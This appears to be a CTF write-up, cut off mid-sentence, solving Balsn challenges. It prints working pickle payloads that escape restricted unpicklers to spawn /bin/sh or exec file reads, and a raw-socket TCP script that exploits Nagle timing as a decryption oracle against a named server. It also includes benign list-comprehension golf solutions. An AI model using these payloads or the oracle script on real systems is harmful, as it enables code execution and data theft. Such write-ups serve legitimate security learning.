SETITEM (s ) |
* <dict> <key> <value> |
* <dict> |
dict[key]=value |
BUILD (b ) |
* <object> <state> |
* <object> |
object.__setstate__(state) or (if the object has no __setstate__ method) object.__dict__.update(state) |
REDUCE (R ) |
* <callable> <argtuple> |
* <res> |
res=callable(*argtuple) |
MARK (( ) |
* |
* MARK |
|
TUPLE (t ) |
* MARK <elem1> ... |
* <t> |
|
DICT (d ) |
* MARK <key1> <val1> ... |
* <d> |
|
INST (i<module>\n<attr>\n ) |
* MARK <arg1> ... |
* <d> |
Creates a new instance of module.attr with the arguments up to the last mark object |
PUT (p<index>\n ) |
* <arg> |
* <arg> |
Store arg in the memo array at a given index |
GET (g<index>\n ) |
* |
* <val> |
Fetch val from the memo array at a given index |
STOP (. ) |
* <ret> |
* <ret> |
Stop and return the top of the stack |
A very detailed documentation of the available instructions can be found in the code of the pickletools
library and the implementation of the pickle
module itself.
In this challenge, a pickle provided from us is unpickled using the following code (slightly adapted for clarity):
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module not in ['sys'] or '.' in name:
raise KeyError('The pickle is spoilt :(')
return pickle.Unpickler.find_class(self, module, name)
def loads(s):
return RestrictedUnpickler(io.BytesIO(s)).load()
This has two implications: (a) we can only access a module with name sys
, and (b) we can only access direct attributes of that module.
Fortunately, the sys
module has an attribute modules
which contains all loaded modules and also allows overwriting these modules. But as pickles provide no GETITEM
instruction and we can only access direct attributes of sys
, we cannot call simply sys.modules.__getitem__
directly. This was easy to work around, though:
SETITEM
, do: sys.modules["sys"] = sys.modules
. After this, future resolves of a module named sys
will now give the previous sys.modules
object! However, we keep the sys.modules
variable on our stack.REDUCE
, do: sys.__getitem__("os")
(as sys
is now actually sys.modules
)SETITEM
, update the "sys"
entry in sys.modules
(still on our stack) to the value from step 2 (the os
module)REDUCE
, do: sys.system("/bin/sh")
(as sys
is now actually os
)Flag: Balsn{p1Ck1iNg_s0m3_PiCklEs}
csys
modules
S'sys'
csys
modules
sS"sys"
csys
__getitem__
(S"os"
tRs0csys
system
(S"/bin/sh"
tR.
In this challenge, an empty module named structs
was added to the folder, and the resolving routine was changed as follows (again adapted for clarity):
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module not in ['structs'] or '.' in name:
raise KeyError('The pickle is spoilt :(')
module = __import__(module)
return getattr(module, name)
def loads(s):
return RestrictedUnpickler(io.BytesIO(s)).load()
Note that now the built-in function __import__
and getattr
are called explicitly.
This routine now only allows access to the (empty) structs
module. Let’s check the attributes of an empty module:
>>> dir(s)
['__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__']
>>> s.__getattribute__
<method-wrapper '__getattribute__' of module object at 0x7fcb2c89e3b0>
>>> s.__dict__
{'__name__': 'structs', '__doc__': None, ...}
The __builtin__
dict looks very promising: it contains plenty of helpful functions (exec
!) and it is writable — overwriting entries in that array changes them everywhere in the program.
The problem, again, is the missing GETITEM
instruction (they should really add one!). This time, we work around that limitation using the BUILD
instruction, which essentially calls obj.__dict__.update(arg)
, effectively adding all entries from a given dict as attributes to an object. Fortunately, we have some objects available — we chose structs.__spec__
— and add all built-ins as attributes to that object.
So, we can overwrite __builtins__['__import__'] = structs.__getattribute__
. In a subsequent resolve, when __import__('structs')
is executed, structs.__getattribute__('structs')
will be called, and from there, the getattr
will give us an attribute of the returned object. Combined structs.__dict__["structs"] = structs.__spec__
, we can achieve that the next resolve of structs.exec
will get us the built-in exec
function. Tasty.
Flag: Balsn{CD_sP33duP_eVe3y7h1nG__Wh0_c4r3s_Th3_c0dE?}
cstructs
__dict__
S"structs"
cstructs
__spec__
cstructs
__builtins__
bscstructs
__builtins__
S"__import__"
cstructs
__getattribute__
scstructs
exec
(S'print(open("../flag.txt").read())'
tR.
In this challenge, the setting was changed a bit more. The unpickler is now the same as in pyshv1, except that we can access the structs
module only:
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module not in ['structs'] or '.' in name:
raise KeyError('The pickle is spoilt :(')
return pickle.Unpickler.find_class(self, module, name)
def loads(s):
return RestrictedUnpickler(io.BytesIO(s)).load()
The structs
module now actually contains a class:
class User(object):
def __init__(self, name, group):
self.name = name
self.group = group
self.isadmin = 0
self.prompt = ''
And the main file looks (shortened to relevant parts) like this:
key = os.urandom(100)
with open('../flag.txt', 'rb') as f:
flag = f.read()
flag = bytes(a ^ b for a, b in zip(key, flag))
user_data = codecs.decode(input().encode('ascii'), 'base64')
user = pickle.loads(user_data)
user.privileged = False
user.flag = flag
# ...
if not user.privileged:
print('flag: Permission denied')
else:
print(bytes(a ^ b for a, b in zip(user.flag, key)))
At this point the goal becomes clear: create a User
object where the privileged
attribute cannot be written. In Python this is indeed possible using descriptors
, which are used by the @property
decorator. When an attribute is set to an instance whose type provides a __set__
method, that method is called instead.
In our case, we only have one available type we can “hijack” — and in fact use for two purposes: as class for the instance to be returned and as descriptor class. The exploit works as follows:
User
a valid descriptor class, for which we need to add a __set__
method taking two arguments. Luckily, the User
class takes two parameters, which is perfectly fine to use for that case. So, we set User.__set__ = User
using the BUILD
instruction. (Detail: as the __dict__
attribute is read-only for some reason, we set this as instance attribute of the object using the slotstate
dict which BUILD
can take. Refer to the implementation for further information.)User
using the INST
instruction and add it as privileged
attribute to the class.User
and return it. If later on privileged
is set, the __set__
method of privileged
will be called, but the attribute will not be changed.Flag: Balsn{pY7h0n1dae_ObJ3c7}
cstructs
User
(N(S"__set__"
cstructs
User
dtbcstructs
User
(N(S"privileged"
(S"q"
S"w"
istructs
User
dtb(S"a"
S"b"
istructs
User
.
This (totally awesome!!) challenge consisted of a extremely neat combination of a few rather subtle information-leakage vulnerabilities. The task script implements a “secure console”, with which we can only communicate in encrypted form — without ever learning the key, so we are effectively blind.
Let’s first have a look at the full glory of the given task.py
:
#!/usr/bin/python3 -u
import sys
import os
import codecs
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
class SecureConsole(object):
def __init__(self):
self.remaining = 40
aes = algorithms.AES(os.urandom(32))
mode = modes.CTR(os.urandom(16))
backend = default_backend()
self.cipher = Cipher(aes, mode, backend=backend)
self.encryptor = self.cipher.encryptor()
def readhexline(self):
chunk = b''
while len(chunk) < 81:
ret = sys.stdin.buffer.read(81 - len(chunk))
if len(ret) == 0:
raise EOFError('EOF while readhexline')
chunk += ret
assert chunk[-1:] == b'\n', 'newline'
chunk = codecs.decode(chunk[:-1], 'hex')
return chunk
def readline(self):
data = b''
decryptor = self.cipher.decryptor()
while not data.endswith(b'\0'):
chunk = self.readhexline()
chunk = decryptor.update(chunk)
data += chunk
return data.rstrip(b'\0')
def write(self, data):
data = data.encode('utf8')
while len(data):
chunk = data[:self.remaining]
ct = self.encryptor.update(chunk)
ct = codecs.encode(ct, 'hex')
sys.stdout.buffer.write(ct)
data = data[len(chunk):]
self.remaining -= len(chunk)
if self.remaining == 0:
sys.stdout.buffer.write(b'\n')
self.remaining = 40
return self
def endl(self):
ct = self.encryptor.update(b'\0' * self.remaining)
ct = codecs.encode(ct, 'hex') + b'\n'
sys.stdout.buffer.write(ct)
self.remaining = 40
return self
def main(flag):
sc = SecureConsole()
sc.write(flag).endl()
for _ in range(30):
sc.write('[>] Gimme your flag: ').endl()
line = sc.readline()
sc.write('[*] Result: ')
try:
line = line.decode('utf8')
if line == flag:
sc.write('OK').endl()
else:
sc.write('Nope').endl()
except:
sc.write('QAQ').endl()
if __name__ == '__main__':
sys.stderr.close()
with open('../flag.txt', 'rb') as f:
flag = f.read()
flag = codecs.encode(flag, 'hex').decode('utf8')
assert len(flag) <= 70
main(flag)
Essentially, the script first dumps the encrypted flag, then proceeds to read input, decrypt it, and compare it against the flag. All server output is padded to multiples of 40 bytes, so the distinct responses "OK"
, "Nope"
, and "QAQ"
just turn into random garbage of the same length — not very useful as an oracle.
After staring at the challenge script for an extended amount of time, we’d finally accumulated the following set of observations, which can be combined to recover the flag and solve the challenge:
"OK"
response."OK"
for a valid flag, "Nope"
for an invalid flag, and — notably — "QAQ"
when the plaintext is not valid UTF8!"OK"
, "Nope"
, or "QAQ"
, before endl()
is called to fill up the 40-byte chunk. Thus, the length of the TCP segment containing the oracle response will allow us to distinguish between the three possible responses.These things together imply the following strategy for leaking information about the flag plaintext: XOR well-chosen differentials into the given flag ciphertext and send it back to the server, then make sure the oracle response is sent out immediately to learn the response, and finally infer some knowledge about the flag from the leakage whether the decrypted manipulated plaintext was valid UTF8 or not.
To illustrate the idea, let’s suppose that the flag is either the string "hello"
or "h3llo"
, and we XOR the bytes 00 80 c0 c0 00
into the flag ciphertext. Then "hello"
turns into the string b"h\xe5\xac\xaco"
, which is a valid UTF8 encoding for the Unicode string “h嬬o”, and "h3llo"
turns into "h\xb3\xac\xaco"
, which is invalid UTF8 as the \xb3
is a standalone continuation byte. Thus, we can distinguish encryptions of those two strings by simply XORing in certain differentials and learning if the corresponding plaintext is still valid UTF8 or not.
Note that the e
vs. 3
example is rather nice: There also exist bytes that simply cannot be distinguished using this technique; for example, the string "dddd" ^ diff
is valid UTF8 if and only if the string "eeee" ^ diff
is.
However, it turns out that combining a few XOR patterns such as the 80 c0 c0
above is enough to constrain the plaintext bytes to a few choices each, at least in the case that each byte is in fact a hex digit 0123456789abcdef
like in the challenge — in that case, the exploit script below obtains at most two guesses per byte, which differ by an XOR of 07
.
Let’s now see how we can manipulate the server to send out the (encrypted) oracle response early. Nagle’s algorithm dictates that data written to a TCP stream should be cached until either a full segment of data has been collected, or the receiving side has acknowledged all previously sent data. Clearly, we cannot force the server to fill its send buffer, so we will try to force the second condition. Note that we are now trying to win a race: We need to ACK the string "[*] Response: "
sent by the server before it write()
s one of the strings "OK"
, "Nope"
, or "QAQ"
to the kernel. In the script above, the timeframe we are trying to hit is
sc.write('[*] Result: ')
# >>>> HERE! <<<< #
try:
line = line.decode('utf8')
if line == flag:
sc.write('OK').endl()
else:
sc.write('Nope').endl()
except:
sc.write('QAQ').endl()
We quickly realized that standard TCP implementations definitely don’t send the ACK quickly enough, so after a bit of experimentation we decided to write our own not-so-quick-and-extremely-dirty hacked TCP version to simply send out an ACK
for the "[*] Result: "
string before we’ve even received it.
Even more, rather than trying to hit the target timeframe exactly with a single packet, we made use of the fact that TCP is rather forgiving with respect to duplicate packets — and simply decided to send the ACK
a few handfuls of times just to be sure.
Notice that nicely enough, this oracle is perfectly sound: If we fail to win the race, the response segment might be inconclusive, but we will never get a response of e.g. eight bytes when the response was not in fact "Nope"
.
For example, here are some tcpdump
outputs of the server’s response segments captured during the competition, for (1) just sending back the (correct) encrypted flag, (2) sending back a wrong encrypted flag (e.g. XOR with 01
), and (3) sending back a ciphertext decrypting to invalid UTF8 (e.g. XOR with 80
). Clearly, the different lengths correspond to the distinct server responses, which is exactly what we wanted.
22:19:41.615484 IP 54.90.150.152.5452 > 95.216.166.62.3476: Flags [P.], seq 268:272, ack 163, win 29876, length 4
22:24:46.997693 IP 54.90.150.152.5452 > 95.216.166.62.55130: Flags [P.], seq 268:276, ack 163, win 29876, length 8
22:24:54.612918 IP 54.90.150.152.5452 > 95.216.166.62.26307: Flags [P.], seq 268:274, ack 163, win 29876, length 6
Putting it all together, we used the following (definitely CTF-grade and therefore not to be used in any real-life anything) script to obtain guesses for each of the flag bytes:
#!/usr/bin/env python3
import socket, random, time, sys, atexit, os, struct
lip = '95.216.166.62' # own ip (ephemeral cloud server, no need to hack :P)
rip = '54.90.150.152' # john.balsnctf.com
FIN = 1 << 0
SYN = 1 << 1
RST = 1 << 2
PSH = 1 << 3
ACK = 1 << 4
class wtf(Exception): pass
class tcp:
# super hacky, doesn't implement much of TCP correctly, but it flogs :)
debug = False
def __init__(self):
self.rs = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
self.rs.bind((lip,0))
self.rs.settimeout(1)
def checksum(self, data, sz):
pseudo = bytes(map(int,lip.split('.'))) + bytes(map(int,rip.split('.')))
pseudo += struct.pack('>BBH', 0, 0x6, sz)
data = pseudo + data
if len(data)%2: data += b'\0'
s = 0
for i in range(0, len(data), 2):
s += struct.unpack('<H', data[i:i+2])[0]
s = (s >> 16) + (s & 0xffff)
s += s >> 16
return ~s & 0xffff
def put(self, flags, data = b''):
header = struct.pack('!HHLLBBHHH', self.src, self.port, self.seq, self.ack, 5 << 4, flags, self.window, 0, 0)
chk = self.checksum(header + data, len(header) + len(data))
header = header[:16] + struct.pack('<H', chk) + header[18:]
self.rs.sendto(header + data, (self.ip, 0))
self.seq += 1 if SYN & flags else len(data)
def get(self):
t0 = time.time()
while True:
if time.time() >= t0 + 1:
raise socket.timeout('oops')
data, addr = self.rs.recvfrom(0x1000)
if addr[0] != self.ip: continue
if len(data) < 40: continue
data = data[20:] # skip IP header, what could go wrong
header = struct.unpack('!HHLLBBHHH', data[:20])
src, port, seq, ack, off, flags, window, chksum, urg = header
off >>= 4
data = data[4*off:]
flags = {f for f in {FIN,SYN,RST,PSH,ACK} if f & flags}
if src == self.port and port == self.src:
break
if tcp.debug:
print('\x1b[34m{} {} {} {} {} {} {} {:#x} {} {}\x1b[0m'.format(src, port, seq, ack, off, flags, window, chksum, urg, data))
self.ack = seq + 1 if SYN in flags else seq + len(data)
return flags, data
def connect(self, addr):
self.ip, self.port = addr
self.src = random.randrange(1024,65536)
self.seq = random.randrange(2**32)
self.ack = 0
self.window = 777
self.put(SYN)
flags, data = self.get()
if flags != {SYN,ACK} or data:
raise wtf('unexpected server response')
self.put(ACK)
def recv(self):
flags, data = self.get()
return data
def send(self, data, send_ack = True):
if tcp.debug: print('\x1b[36m{}\x1b[0m'.format(data))
self.put(PSH | (ACK if send_ack else 0), data)
def close(self):
self.put(FIN)
def oracle(diff):
# prevent the kernel from killing our connection (only) while we're working
os.system('iptables -D OUTPUT -p tcp -m tcp --tcp-flags RST RST -j DROP 2>/dev/null')
time.sleep(1) #XXX seems like we're rate limited?
os.system('iptables -A OUTPUT -p tcp -m tcp --tcp-flags RST RST -j DROP')
sock = tcp()
try:
sock.connect((rip, 5452))
except wtf:
print('\x1b[31mretrying\x1b[0m', end='\r'); sys.stdout.flush()
return oracle(diff)
cipher = b''
while True:
cipher += sock.recv()
if len(cipher) < 81*3:
sock.put(ACK)
else:
break
# print(cipher)
cipher = bytes.fromhex(cipher.decode().replace('\n',''))
assert len(cipher)%40 == 0
dblks = [diff[i:][:40] for i in range(0,len(diff),40)]
cblks = [cipher[i:][:40] for i in range(0,len(cipher),40)]
blks = [bytes(c^d for c,d in zip(cblk,dblk)) for cblk,dblk in zip(cblks,dblks)]
assert len(blks) == 2
assert {len(blk) for blk in blks} == {40}
sock.send(''.join(blk.hex() + '\n' for blk in blks).encode())
# this is where the magic happens: we immediately ACK the "[*] Result: "
# prefix to make sure the following ciphertext chunk is sent right away.
# the length of that segment leaks the plaintext (one of OK/Nope/QAQ).
sock.ack += 2 * len('[*] Result: ')
for _ in range(16): # viel hilft viel
sock.put(ACK)
t0 = time.time()
while time.time() < t0 + 1:
flags, data = sock.get()
if flags == {PSH,ACK}:
if len(data) == 8:
sock.close()
return True # valid UTF8, invalid flag
elif len(data) == 4:
sock.close()
raise Exception('was valid flag')
elif len(data) == 6:
sock.close()
return False # invalid UTF8
sock.close()
# something went wrong (didn't leak), let's retry
print('\x1b[31mretrying\x1b[0m', end='\r'); sys.stdout.flush()
return oracle(diff)
atexit.register(lambda: os.system('iptables -D OUTPUT -p tcp -m tcp --tcp-flags RST RST -j DROP'))
# valid UTF8 chars; these together uniquely identify hex digits up to ^7.
patterns = [
[0xf4, 0x81, 0x81, 0x81],
[0xf3, 0x81, 0x81, 0x81],
[0xef, 0x81, 0x81, 0x00],
[0xdf, 0x81, 0x00, 0x00],
]
pos = 69 # task script says len(hex_flag) <= 70
known = [[] for _ in range(70)] + [[0] for _ in range(10)]
pos, known[62:70] = 61, [[0]]*8 #XXX learned this on an earlier (failed) attempt
while pos >= 0:
for guess in b'\0' + (b'0123456789abcdef' if pos%2 else b'234567'):
if 0 in known[pos]:
continue
good = 1
for pat in patterns:
diff = [0] * 80
diff[pos] = guess ^ pat[0]
for i in range(1,len(pat)):
diff[pos+i] = pat[i] ^ known[pos+i][0]
while True:
try:
res = oracle(bytes(diff))
break
except socket.timeout:
print('\x1b[31mtimeout\x1b[0m', end='\r'); sys.stdout.flush()
time.sleep(3)
good &= res
print('{:2} {:02x} ({}) ~> \x1b[36m{}\x1b[0m ~> \x1b[33m{}\x1b[0m'.format(pos, guess, bytes(pat).hex(), int(res), good))
if not good: break
if good:
known[pos].append(guess)
print('--> {}'.format(','.join('\x1b[32m{}\x1b[0m'.format(''.join(map(chr,k))) for k in known)))
pos -= 1
Running this script gives something like the following (slowly appearing) output:
61 00 (f4818181) ~> 0 ~> 0
61 30 (f4818181) ~> 0 ~> 0
61 31 (f4818181) ~> 0 ~> 0
61 32 (f4818181) ~> 0 ~> 0
61 33 (f4818181) ~> 0 ~> 0
61 34 (f4818181) ~> 0 ~> 0
61 35 (f4818181) ~> 0 ~> 0
61 36 (f4818181) ~> 0 ~> 0
61 37 (f4818181) ~> 0 ~> 0
61 38 (f4818181) ~> 0 ~> 0
61 39 (f4818181) ~> 0 ~> 0
61 61 (f4818181) ~> 1 ~> 1
61 61 (f3818181) ~> 1 ~> 1
61 61 (ef818100) ~> 1 ~> 1
61 61 (df810000) ~> 1 ~> 1
61 62 (f4818181) ~> 0 ~> 0
61 63 (f4818181) ~> 0 ~> 0
61 64 (f4818181) ~> 1 ~> 1
61 64 (f3818181) ~> 0 ~> 0
61 65 (f4818181) ~> 0 ~> 0
61 66 (f4818181) ~> 1 ~> 1
61 66 (f3818181) ~> 1 ~> 1
61 66 (ef818100) ~> 1 ~> 1
61 66 (df810000) ~> 1 ~> 1
--> ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,af,,,,,,,,,,,,,,,,,,
60 00 (f4818181) ~> 0 ~> 0
60 32 (f4818181) ~> 0 ~> 0
60 33 (f4818181) ~> 0 ~> 0
60 34 (f4818181) ~> 0 ~> 0
60 35 (f4818181) ~> 1 ~> 1
60 35 (f3818181) ~> 0 ~> 0
60 36 (f4818181) ~> 1 ~> 1
60 36 (f3818181) ~> 0 ~> 0
60 37 (f4818181) ~> 1 ~> 1
60 37 (f3818181) ~> 1 ~> 1
60 37 (ef818100) ~> 1 ~> 1
60 37 (df810000) ~> 1 ~> 1
--> ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,7,af,,,,,,,,,,,,,,,,,,
59 00 (f4818181) ~> 0 ~> 0
59 30 (f4818181) ~> 0 ~> 0
59 31 (f4818181) ~> 0 ~> 0
59 32 (f4818181) ~> 0 ~> 0
59 33 (f4818181) ~> 0 ~> 0
59 34 (f4818181) ~> 0 ~> 0
59 35 (f4818181) ~> 0 ~> 0
59 36 (f4818181) ~> 0 ~> 0
59 37 (f4818181) ~> 0 ~> 0
59 38 (f4818181) ~> 0 ~> 0
59 39 (f4818181) ~> 0 ~> 0
59 61 (f4818181) ~> 1 ~> 1
59 61 (f3818181) ~> 0 ~> 0
59 62 (f4818181) ~> 1 ~> 1
59 62 (f3818181) ~> 0 ~> 0
59 63 (f4818181) ~> 1 ~> 1
59 63 (f3818181) ~> 1 ~> 1
59 63 (ef818100) ~> 1 ~> 1
59 63 (df810000) ~> 1 ~> 1
59 64 (f4818181) ~> 1 ~> 1
59 64 (f3818181) ~> 1 ~> 1
59 64 (ef818100) ~> 1 ~> 1
59 64 (df810000) ~> 1 ~> 1
59 65 (f4818181) ~> 0 ~> 0
59 66 (f4818181) ~> 0 ~> 0
--> ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,cd,7,af,,,,,,,,,,,,,,,,,,
58 00 (f4818181) ~> 0 ~> 0
58 32 (f4818181) ~> 1 ~> 1
58 32 (f3818181) ~> 0 ~> 0
58 33 (f4818181) ~> 0 ~> 0
58 34 (f4818181) ~> 0 ~> 0
58 35 (f4818181) ~> 0 ~> 0
58 36 (f4818181) ~> 0 ~> 0
58 37 (f4818181) ~> 1 ~> 1
58 37 (f3818181) ~> 1 ~> 1
58 37 (ef818100) ~> 1 ~> 1
58 37 (df810000) ~> 1 ~> 1
--> ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,7,cd,7,af,,,,,,,,,,,,,,,,,,
[...omitted...]
--> ,,,,,,,34,6,be,7,be,25,25,34,34,6,34,34,34,34,16,34,be,6,07,25,af,25,07,6,9,25,34,6,8,25,af,34,af,34,07,6,8,6,be,25,af,34,be,34,34,6,07,34,16,6,25,7,cd,7,af,,,,,,,,,,,,,,,,,,
6 00 (f4818181) ~> 0 ~> 0
6 32 (f4818181) ~> 1 ~> 1
6 32 (f3818181) ~> 0 ~> 0
6 33 (f4818181) ~> 0 ~> 0
6 34 (f4818181) ~> 0 ~> 0
6 35 (f4818181) ~> 0 ~> 0
6 36 (f4818181) ~> 0 ~> 0
6 37 (f4818181) ~> 1 ~> 1
6 37 (f3818181) ~> 1 ~> 1
6 37 (ef818100) ~> 1 ~> 1
6 37 (df810000) ~> 1 ~> 1
--> ,,,,,,7,34,6,be,7,be,25,25,34,34,6,34,34,34,34,16,34,be,6,07,25,af,25,07,6,9,25,34,6,8,25,af,34,af,34,07,6,8,6,be,25,af,34,be,34,34,6,07,34,16,6,25,7,cd,7,af,,,,,,,,,,,,,,,,,,
5 00 (f4818181) ~> 0 ~> 0
5 30 (f4818181) ~> 0 ~> 0
5 31 (f4818181) ~> 0 ~> 0
5 32 (f4818181) ~> 0 ~> 0
5 33 (f4818181) ~> 0 ~> 0
5 34 (f4818181) ~> 0 ~> 0
5 35 (f4818181) ~> 0 ~> 0
5 36 (f4818181) ~> 0 ~> 0
5 37 (f4818181) ~> 0 ~> 0
5 38 (f4818181) ~> 0 ~> 0
5 39 (f4818181) ~> 0 ~> 0
5 61 (f4818181) ~> 0 ~> 0
5 62 (f4818181) ~> 0 ~> 0
5 63 (f4818181) ~> 1 ~> 1
5 63 (f3818181) ~> 1 ~> 1
5 63 (ef818100) ~> 1 ~> 1
5 63 (df810000) ~> 1 ~> 1
5 64 (f4818181) ~> 1 ~> 1
5 64 (f3818181) ~> 1 ~> 1
5 64 (ef818100) ~> 1 ~> 1
5 64 (df810000) ~> 1 ~> 1
5 65 (f4818181) ~> 1 ~> 1
5 65 (f3818181) ~> 0 ~> 0
5 66 (f4818181) ~> 1 ~> 1
5 66 (f3818181) ~> 0 ~> 0
--> ,,,,,cd,7,34,6,be,7,be,25,25,34,34,6,34,34,34,34,16,34,be,6,07,25,af,25,07,6,9,25,34,6,8,25,af,34,af,34,07,6,8,6,be,25,af,34,be,34,34,6,07,34,16,6,25,7,cd,7,af,,,,,,,,,,,,,,,,,,
4 00 (f4818181) ~> 0 ~> 0
4 32 (f4818181) ~> 0 ~> 0
4 33 (f4818181) ~> 1 ~> 1
4 33 (f3818181) ~> 0 ~> 0
4 34 (f4818181) ~> 0 ~> 0
4 35 (f4818181) ~> 0 ~> 0
4 36 (f4818181) ~> 1 ~> 1
4 36 (f3818181) ~> 1 ~> 1
4 36 (ef818100) ~> 1 ~> 1
4 36 (df810000) ~> 1 ~> 1
4 37 (f4818181) ~> 0 ~> 0
--> ,,,,6,cd,7,34,6,be,7,be,25,25,34,34,6,34,34,34,34,16,34,be,6,07,25,af,25,07,6,9,25,34,6,8,25,af,34,af,34,07,6,8,6,be,25,af,34,be,34,34,6,07,34,16,6,25,7,cd,7,af,,,,,,,,,,,,,,,,,,
(Note that we terminated the script at that point because we’d successfully found the flag.)
The important bits are the lines starting with -->
: The digits between each comma are the possible flag characters for that position. This still gives about
Thus, finally, without further ado, the flag is:
Balsn{R4c31Ng_WiTh_J0hn_N4g1e}\x7f
(I’m not exactly sure where the \x7f
comes from; it seems that it was just part of ../flag.txt
.)
In this challenge you had to solve three problems only using Python3 list comprehensions with a limited amount of characters each. Additionally, “ and ‘ were forbidden.
Flag: Balsn{8_8_l13t_c0mp63h3ns10n_0r_A_5en8_80x_ch01l3n93}
After connecting to the service and solving the PoW one was greeted with a text stating the rules and the first problem.
Question: The first line would contain a positive integer N. Then there would be N lines below. Each line contains two integer A and B. Please output the corresponding A+B.
Example Input:
3
1 2
3 4
5 6
Example Output:
3
7
11
Input Length Limit: 75
I took a straight forward approach to this first question. I read the first line via input
converted it to an integer. Knowing how many lines follow i read in each of them, convert all numbers on the line to integers, storing them in a list. Then i sum up that list and print the result.
[print(sum(list(map(int,input().split()))))for x in range(int(input()))]
After realizing sum
also does work with a map not just a list and having the idea of creating an array of uncalled input functions I golfed my initial solution from 73 down to 62 characters
[print(sum(map(int,x().split())))for x in[input]*int(input())]
After all tests had passed and I was greeted with a Congrats! You pass question 0.
I started with the second problem.
Question: This is the knapsack problem that you know. Sasdffan is going to buy some junk foods. However, he has only limited budgets M. Each junk food would have two attributes, the cost of buying the junk food and the value of eating the junk food. The first line contains two positive integers N and M. Then, there would be N lines below. Each line contains two positive integers v and c. (v: value, c: cost). Please output the maximum value that Sasdffan could get after consuming all the junk foods he bought. Caution: Each junk food could only be bought once.
1000 <= N <= 2000, 1 <= M <= 3000, 1 <= c <= 3000, v > 0
Example Input:
3 5
1 2
1 3
2 2
Example Output:
3
Input Length Limit: 200
This challenge initially gave me lots of trouble as I initially tried to implement a naive algorithm assuming the tight character limit would not allow for a proper knapsack implementation. Not only consuming quite some time getting the first working solution, I also was unable to meet the 200 character requirement.
[print(max([sum(x[::2])for n,m in[tuple(map(int,input().split()))]for d in[[list(map(int,x().split()))for x in[input]*n]]for x in[sum([d for j,d in enumerate(d)if i>>j&1],[])for I in range(2**n)]if sum(x[1::2])<=m]))]
Nevertheless, this first solution contains a couple of ideas. The first and most important one was to use the for x in y
syntax as an assignment operator by transforming x := y
into for x in [y]
. Creating a one element long list from y results in x taking the value y during execution. While it is not possible to overwrite this assignment I could now use x
multiple times. This was required as I was not able to read in n,m
multiple times.
This solution can also be broken down into multiple parts.
for n,m in[tuple(map(int,input().split()))]for d in[[list(map(int,x().split()))for x in[input]*n]]
The first part reads the input and provides the number of elements n
and the amount of money m
as well as a list of two element lists d
containing all junk food items.
for x in[sum([d for j,d in enumerate(d)if i>>j&1],[])for I in range(2**n)]
The second part calculated all possible combinations of items by iterating overall numbers until 2**n
. Taking that number in binary representation the individual bits are treated as flags that decide which junk food is put into the bag. They are not summed up as one may think. Instead their two element list representations are concatenated. The values now are at each odd index while the costs are stored in the even indexes. Note that at this stage combinations that cost more than m
are generated as well.
This whole creation is now wrapped into the front part that extracts the cost and a clause at the end of the comprehension that checks whether the cost exceeds the budged. Finally, the maximum is taken and then printed.
[print(max([sum(x[::2])for insert_here in["part one","part two"]if sum(x[1::2])<=m]))]
After thinking hard for a while I finally managed to shrink the solution below the 200 character mark to 197:
[print(max(int(x.real)for n,m in[map(int,input().split())]for d in[[complex(*map(int,x().split()))for x in[input]*n]]for x in[sum(d[j]for j in range(n)if i>>j&1)for I in range(2**n)]if x.imag<=m))]
A nifty trick was to use the complex number type. This way I could directly sum the elements in part two and access the value via the real and the cost via the imaginary part of the complex number.
While I finally met the size constraints this solution was still not accepted. After sending it to the server I was greeted by Runtime Error QQ
. I quickly realized that my O(2**n)
implementation exceeds the allowed resource limit and had to rethink the entire approach.
I briefly searched for other people already having golfed knapsack in python to maybe shortcut the challenge. The only post in the code golf stack exchange I found was not directly applicable and would have to be rewritten into a list comprehension with only 15 characters to spare. I decided to give the pseudo code implementation from Wikipedia a shot.
// Input:
// Values (stored in array v)
// Weights (stored in array w)
// Number of distinct items (n)
// Knapsack capacity (W)
// NOTE: The array "v" and array "w" are assumed to store all relevant values starting at index 1.
for j from 0 to W do:
m[0, j] := 0
for I from 1 to n do:
for j from 0 to W do:
if w[i] > j then:
m[i, j] := m[i-1, j]
else:
m[i, j] := max(m[i-1, j], m[i-1, j-w[i]] + v[i])
The most important realization I had was that the individual rounds for i
only directly access the previous one and that m[i,j]
is always at least as great as m[i-1,j]
. Therefore, I can implement the first loop as a recursion. I just needed to create a lambda function and pass that function itself as some argument.
Instead of using two arrays I also only use one with value and cost being interleaved.
Finally, I also reduced the size of the reading part by applying a cool trick I found in a code golf python tips answer on stack overflow.
[f(f,[0]*m,0)for n,m,*d in [map(int,open(0).read().split())]for f in[lambda f,a,i:f(f,[a[j]if d[2*i+1]>j else max(a[j],a[j-d[2*i+1]]+d[2*i])for j in range(m)],i+1)if i<n else print(max(a))]]
I finally ended up with a 197 character long solution that also got accepted by the checker.
Surprisingly the last problem did not give me nearly as much trouble as the previous one.
Question: Depth of the tree. There is a size N tree with node index from 0 to N-1. The first line is an integer N (tree size). Then, there would be N numbers in the next line each represents the father of the node. (0 is always the root). 10 <= N <=10000. Please notice that for any i, father[i] < i.
Example Input:
3
0 0 1
Example Output:
2
Input Length Limit: 300
Achtung: Teile der Antwort könnten die Bevölkerung verunsichern - Caution: Parts of this answer can be considered disturbing. Readers discretion is advised
I had a short enough solution for this part even before I finished the previous problem.
[print(max(*[f(f,d,[],0)for n in[int(input())]for d in[[*map(int,input().split())]]for f in[lambda f,d,a,c:a if c>=n else f(f,d,a+([a[d[c]-1]+1]if d[c] else[1]),c+1)]]))]
The first line is read into n
and the numbers on the second line into d
. Then a recursive function f
is defined. This function takes itself as first argument, all inputs as second, an accumulator storing the tree depth as third and finally a variable holding the recursion depth. The recursive function f
